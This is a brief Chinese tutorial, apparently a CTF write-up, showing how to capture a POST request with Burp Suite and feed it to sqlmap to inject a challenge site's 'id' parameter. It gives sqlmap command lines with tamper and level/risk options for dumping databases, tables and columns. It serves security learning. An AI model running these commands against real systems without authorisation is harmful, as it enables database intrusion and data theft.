利用burpsite和sqlmap进行post注入

来源:互联网 发布:mac安装windows系统 编辑:程序博客网 时间:2024/05/18 06:23

尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)

http://120.24.86.145:8002/chengjidan/

第一步 用burpsite抓包并保存成txt

这里写图片描述

第二步 用sqlmap语句

sqlmap  -r 保存的txt文件  -p  需要注入的变量

然后我们的注入语句为

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --dbs

但是会报错

第三步 用sqlmap根据题目补充

因为缺少东西我们根据提示补充,最后为

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --dbs --tamper=space2comment  --level 5 --risk 3

就成功了

这里写图片描述

这个题目就不多讲,剩下的报表

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --tables --tamper=space2comment  --level 5 --risk 3

爆列

python sqlmap.py  -r C:\Users\Assassin\Desktop\input.txt -p id --columns --tamper=space2comment  --level 5 --risk 3
原创粉丝点击